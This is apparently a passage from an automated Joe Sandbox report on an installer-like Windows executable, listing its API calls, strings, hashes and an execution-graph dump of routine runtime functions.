                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressCloseHandleModuleProc
                                                                                        • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                        • API String ID: 4190037839-2401316094
                                                                                        • Opcode ID: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                        • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                        • Opcode Fuzzy Hash: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                        • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                        • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                        • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                        • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                        • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                        • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                        • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                        • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                        • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                        • String ID:
                                                                                        • API String ID: 1694776339-0
                                                                                        • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                        • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                        • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                        • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                        APIs
                                                                                        • GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE
                                                                                          • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                          • Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLocale$DefaultSystem
                                                                                        • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                        • API String ID: 1044490935-665933166
                                                                                        • Opcode ID: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                        • Instruction ID: cc137df54ae1fcbb63b87987e69a719e9c27c4b31815d0debc5c9b1d2781c89a
                                                                                        • Opcode Fuzzy Hash: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                        • Instruction Fuzzy Hash: F8515374B00548ABDB00EBA59891A5F7769DB88304F50D5BBB515BB3C6CA3DCA058F1C
                                                                                        APIs
                                                                                        • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                        • LocalFree.KERNEL32(004CAB80,00000000,00401AB4), ref: 00401A1B
                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,004CAB80,00000000,00401AB4), ref: 00401A3A
                                                                                        • LocalFree.KERNEL32(004CBB80,?,00000000,00008000,004CAB80,00000000,00401AB4), ref: 00401A79
                                                                                        • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                        • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 3782394904-0
                                                                                        • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                        • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                        • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                        • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                        APIs
                                                                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                        • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExitMessageProcess
                                                                                        • String ID: Error$Runtime error at 00000000$9@
                                                                                        • API String ID: 1220098344-1503883590
                                                                                        • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                        • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                        • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                        • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                        • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                        • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$AllocString
                                                                                        • String ID:
                                                                                        • API String ID: 262959230-0
                                                                                        • Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                        • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                        • Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                        • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
                                                                                        • GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CommandHandleLineModule
                                                                                        • String ID: U1hd.@$%K
                                                                                        • API String ID: 2123368496-2600722078
                                                                                        • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                        • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                        • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                        • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                        APIs
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,00409918,00000000), ref: 00406E4C
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue
                                                                                        • String ID: )q@
                                                                                        • API String ID: 3660427363-2284170586
                                                                                        • Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                        • Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
                                                                                        • Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                        • Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99
                                                                                        APIs
                                                                                        • MessageBoxA.USER32(00000000,00000000,Setup,00000010), ref: 00409CBD
                                                                                        Strings
                                                                                        • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 00409CA1
                                                                                        • Setup, xrefs: 00409CAD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message
                                                                                        • String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
                                                                                        • API String ID: 2030045667-3271211647
                                                                                        • Opcode ID: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                        • Instruction ID: b8b600ed6bdfe48e96a015bdf4867c85bc36f5512d0f27a60c0f94c744360238
                                                                                        • Opcode Fuzzy Hash: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                        • Instruction Fuzzy Hash: 8EE0E5302482087EE311EA528C13F6A7BACE789B04F600477F900B15C3D6786E00A068
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
                                                                                        • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409507
                                                                                        • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
                                                                                        • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409524
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555008849.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3554980956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555039165.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555056014.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastSleep
                                                                                        • String ID:
                                                                                        • API String ID: 1458359878-0
                                                                                        • Opcode ID: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                        • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                        • Opcode Fuzzy Hash: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                        • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                                        Execution Graph

                                                                                        Execution Coverage:16%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:4.6%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:85
                                                                                        execution_graph 49944 40cd00 49945 40cd12 49944->49945 49946 40cd0d 49944->49946 49948 406f48 CloseHandle 49946->49948 49948->49945 49949 492848 49950 49287c 49949->49950 49951 49287e 49950->49951 49952 492892 49950->49952 50095 446f9c 18 API calls 49951->50095 49955 4928ce 49952->49955 49956 4928a1 49952->49956 49954 492887 Sleep 50048 4928c9 49954->50048 49961 49290a 49955->49961 49962 4928dd 49955->49962 50085 446ff8 49956->50085 49960 4928b0 49964 4928b8 FindWindowA 49960->49964 49967 492919 49961->49967 49968 492960 49961->49968 49963 446ff8 18 API calls 49962->49963 49965 4928ea 49963->49965 50089 447278 49964->50089 49969 4928f2 FindWindowA 49965->49969 50096 446f9c 18 API calls 49967->50096 49973 4929bc 49968->49973 49974 49296f 49968->49974 49971 447278 5 API calls 49969->49971 50035 492905 49971->50035 49972 492925 50097 446f9c 18 API calls 49972->50097 49980 492a18 49973->49980 49981 4929cb 49973->49981 50100 446f9c 18 API calls 49974->50100 49977 492932 50098 446f9c 18 API calls 49977->50098 49978 49297b 50101 446f9c 18 API calls 49978->50101 49991 492a52 49980->49991 49992 492a27 49980->49992 50105 446f9c 18 API calls 49981->50105 49983 49293f 50099 446f9c 18 API calls 49983->50099 49986 492988 50102 446f9c 18 API calls 49986->50102 49987 49294a SendMessageA 49990 447278 5 API calls 49987->49990 49988 4929d7 50106 446f9c 18 API calls 49988->50106 49990->50035 50003 492a61 49991->50003 50004 492aa0 49991->50004 49995 446ff8 18 API calls 49992->49995 49994 492995 50103 446f9c 18 API calls 49994->50103 49998 492a34 49995->49998 49996 4929e4 50107 446f9c 18 API calls 49996->50107 50005 492a3c RegisterClipboardFormatA 49998->50005 50000 4929a0 PostMessageA 50104 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50000->50104 50002 4929f1 50108 446f9c 18 API calls 50002->50108 50110 446f9c 18 API calls 50003->50110 50012 492aaf 50004->50012 50013 492af4 50004->50013 50008 447278 5 API calls 50005->50008 50008->50048 50009 4929fc SendNotifyMessageA 50109 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50009->50109 50010 492a6d 50111 446f9c 18 API calls 50010->50111 50113 446f9c 18 API calls 50012->50113 50020 492b48 50013->50020 50021 492b03 50013->50021 50015 492a7a 50112 446f9c 18 API calls 50015->50112 50018 492abb 50114 446f9c 18 API calls 50018->50114 50019 492a85 SendMessageA 50023 447278 5 API calls 50019->50023 50028 492b57 50020->50028 50034 492baa 50020->50034 50117 446f9c 18 API calls 50021->50117 50023->50035 50025 492ac8 50115 446f9c 18 API calls 50025->50115 50026 492b0f 50118 446f9c 18 API calls 50026->50118 50032 446ff8 18 API calls 50028->50032 50030 492ad3 PostMessageA 50116 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50030->50116 50036 492b64 50032->50036 50033 492b1c 50119 446f9c 18 API calls 50033->50119 50038 492bb9 50034->50038 50039 492c31 50034->50039 50035->50048 50121 42e394 SetErrorMode 50036->50121 50042 446ff8 18 API calls 50038->50042 50050 492c40 50039->50050 50051 492c66 50039->50051 50041 492b27 SendNotifyMessageA 50120 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50041->50120 50045 492bc8 50042->50045 50043 492b71 50046 492b87 GetLastError 50043->50046 50047 492b77 50043->50047 50124 446f9c 18 API calls 50045->50124 50052 447278 5 API calls 50046->50052 50049 447278 5 API calls 50047->50049 50135 403420 50048->50135 50053 492b85 50049->50053 50129 446f9c 18 API calls 50050->50129 50058 492c98 50051->50058 50059 492c75 50051->50059 50052->50053 50057 447278 5 API calls 50053->50057 50056 492c4a FreeLibrary 50130 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50056->50130 50057->50048 50068 492ca7 50058->50068 50074 492cdb 50058->50074 50062 446ff8 18 API calls 50059->50062 50060 492bdb GetProcAddress 50063 492c21 50060->50063 50064 492be7 50060->50064 50065 492c81 50062->50065 50128 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50063->50128 50125 446f9c 18 API calls 50064->50125 50070 492c89 CreateMutexA 50065->50070 50131 48ccc8 18 API calls 50068->50131 50069 492bf3 50126 446f9c 18 API calls 50069->50126 50070->50048 50073 492c00 50077 447278 5 API calls 50073->50077 50074->50048 50133 48ccc8 18 API calls 50074->50133 50076 492cb3 50079 492cc4 OemToCharBuffA 50076->50079 50078 492c11 50077->50078 50127 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50078->50127 50132 48cce0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50079->50132 50082 492cf6 50083 492d07 CharToOemBuffA 50082->50083 50134 48cce0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50083->50134 50086 447000 50085->50086 50139 436078 50086->50139 50088 44701f 50088->49960 50090 447280 50089->50090 50193 4363e0 VariantClear 50090->50193 50092 4472ba 50092->50048 50093 4472a3 50093->50092 50194 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50093->50194 50095->49954 50096->49972 50097->49977 50098->49983 50099->49987 50100->49978 50101->49986 50102->49994 50103->50000 50104->50035 50105->49988 50106->49996 50107->50002 50108->50009 50109->50048 50110->50010 50111->50015 50112->50019 50113->50018 50114->50025 50115->50030 50116->50035 50117->50026 50118->50033 50119->50041 50120->50048 50195 403738 50121->50195 50124->50060 50125->50069 50126->50073 50127->50035 50128->50035 50129->50056 50130->50048 50131->50076 50132->50048 50133->50082 50134->50048 50137 403426 50135->50137 50136 40344b 50137->50136 50138 402660 4 API calls 50137->50138 50138->50137 50140 436084 50139->50140 50150 4360a6 50139->50150 50140->50150 50159 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50140->50159 50141 436129 50168 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50141->50168 50143 436111 50163 403494 50143->50163 50144 436105 50144->50088 50145 4360f9 50154 403510 4 API calls 50145->50154 50146 4360ed 50160 403510 50146->50160 50147 43611d 50167 4040e8 18 API calls 50147->50167 50150->50141 50150->50143 50150->50144 50150->50145 50150->50146 50150->50147 50153 43613a 50153->50088 50158 436102 50154->50158 50156 436126 50156->50088 50158->50088 50159->50150 50169 4034e0 50160->50169 50165 403498 50163->50165 50164 4034ba 50164->50088 50165->50164 50166 402660 4 API calls 50165->50166 50166->50164 50167->50156 50168->50153 50174 4034bc 50169->50174 50171 4034f0 50179 403400 50171->50179 50175 4034c0 50174->50175 50176 4034dc 50174->50176 50183 402648 50175->50183 50176->50171 50178 4034c9 50178->50171 50180 403406 50179->50180 50181 40341f 50179->50181 50180->50181 50188 402660 50180->50188 50181->50088 50184 40264c 50183->50184 50185 402656 50183->50185 50184->50185 50187 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50184->50187 50185->50178 50185->50185 50187->50185 50189 402664 50188->50189 50190 40266e 50188->50190 50189->50190 50192 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50189->50192 50190->50181 50190->50190 50192->50190 50193->50093 50194->50092 50196 40373c LoadLibraryA 50195->50196 50196->50043 54070 498ba8 54128 403344 54070->54128 54072 498bb6 54131 4056a0 54072->54131 54074 498bbb 54134 40631c GetModuleHandleA GetProcAddress 54074->54134 54078 498bc5 54142 40994c 54078->54142 54409 4032fc 54128->54409 54130 403349 GetModuleHandleA GetCommandLineA 54130->54072 54133 4056db 54131->54133 54410 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54131->54410 54133->54074 54135 406338 54134->54135 54136 40633f GetProcAddress 54134->54136 54135->54136 54137 406355 GetProcAddress 54136->54137 54138 40634e 54136->54138 54139 406364 SetProcessDEPPolicy 54137->54139 54140 406368 54137->54140 54138->54137 54139->54140 54141 4063c4 6F551CD0 54140->54141 54141->54078 54411 409024 54142->54411 54409->54130 54410->54133 54412 408cbc 5 API calls 54411->54412 54413 409035 54412->54413 54414 4085dc GetSystemDefaultLCID 54413->54414 54418 408612 54414->54418 54415 408568 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 54415->54418 54416 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54416->54418 54417 406dec LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54417->54418 54418->54415 54418->54416 54418->54417 54419 408674 54418->54419 54420 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54419->54420 54421 406dec LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54419->54421 54422 408568 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 54419->54422 54423 4086f7 54419->54423 54420->54419 54421->54419 54422->54419 54424 403420 4 API calls 54423->54424 54425 408711 54424->54425 54426 408720 GetSystemDefaultLCID 54425->54426 54483 408568 GetLocaleInfoA 54426->54483 54429 403450 4 API calls 54430 408760 54429->54430 54431 408568 5 API calls 54430->54431 54432 408775 54431->54432 54433 408568 5 API calls 54432->54433 54434 408799 54433->54434 54489 4085b4 GetLocaleInfoA 54434->54489 54437 4085b4 GetLocaleInfoA 54438 4087c9 54437->54438 54439 408568 5 API calls 54438->54439 54440 4087e3 54439->54440 54441 4085b4 GetLocaleInfoA 54440->54441 54442 408800 54441->54442 54484 4085a1 54483->54484 54485 40858f 54483->54485 54486 403494 4 API calls 54484->54486 54487 4034e0 4 API calls 54485->54487 54488 40859f 54486->54488 54487->54488 54488->54429 54490 4085d0 54489->54490 54490->54437 55848 42f520 55849 42f52b 55848->55849 55850 42f52f NtdllDefWindowProc_A 55848->55850 55850->55849 50197 416b42 50198 416bea 50197->50198 50199 416b5a 50197->50199 50216 41531c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50198->50216 50201 416b74 SendMessageA 50199->50201 50202 416b68 50199->50202 50212 416bc8 50201->50212 50203 416b72 CallWindowProcA 50202->50203 50204 416b8e 50202->50204 50203->50212 50213 41a058 GetSysColor 50204->50213 50207 416b99 SetTextColor 50208 416bae 50207->50208 50214 41a058 GetSysColor 50208->50214 50210 416bb3 SetBkColor 50215 41a6e0 GetSysColor CreateBrushIndirect 50210->50215 50213->50207 50214->50210 50215->50212 50216->50212 55851 4358e0 55852 4358f5 55851->55852 55856 43590f 55852->55856 55857 4352c8 55852->55857 55862 435312 55857->55862 55868 4352f8 55857->55868 55858 403400 4 API calls 55859 435717 55858->55859 55859->55856 55870 435728 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55859->55870 55860 446da4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55860->55868 55861 402648 4 API calls 55861->55868 55862->55858 55864 431ca0 4 API calls 55864->55868 55865 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55865->55868 55866 403744 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55866->55868 55867 4038a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55867->55868 55868->55860 55868->55861 55868->55862 55868->55864 55868->55865 55868->55866 55868->55867 55871 4343b0 55868->55871 55883 434b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55868->55883 55870->55856 55872 43446d 55871->55872 55873 4343dd 55871->55873 55902 434310 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55872->55902 55874 403494 4 API calls 55873->55874 55876 4343eb 55874->55876 55878 403778 4 API calls 55876->55878 55877 403400 4 API calls 55879 4344bd 55877->55879 55881 43440c 55878->55881 55879->55868 55880 43445f 55880->55877 55881->55880 55884 494944 55881->55884 55883->55868 55885 49497c 55884->55885 55886 494a14 55884->55886 55887 403494 4 API calls 55885->55887 55903 448930 55886->55903 55891 494987 55887->55891 55889 494997 55890 403400 4 API calls 55889->55890 55892 494a38 55890->55892 55891->55889 55893 4037b8 4 API calls 55891->55893 55894 403400 4 API calls 55892->55894 55896 4949b0 55893->55896 55895 494a40 55894->55895 55895->55881 55896->55889 55897 4037b8 4 API calls 55896->55897 55898 4949d3 55897->55898 55899 403778 4 API calls 55898->55899 55900 494a04 55899->55900 55901 403634 4 API calls 55900->55901 55901->55886 55902->55880 55904 448955 55903->55904 55905 448998 55903->55905 55906 403494 4 API calls 55904->55906 55907 4489ac 55905->55907 55915 44852c 55905->55915 55908 448960 55906->55908 55910 403400 4 API calls 55907->55910 55912 4037b8 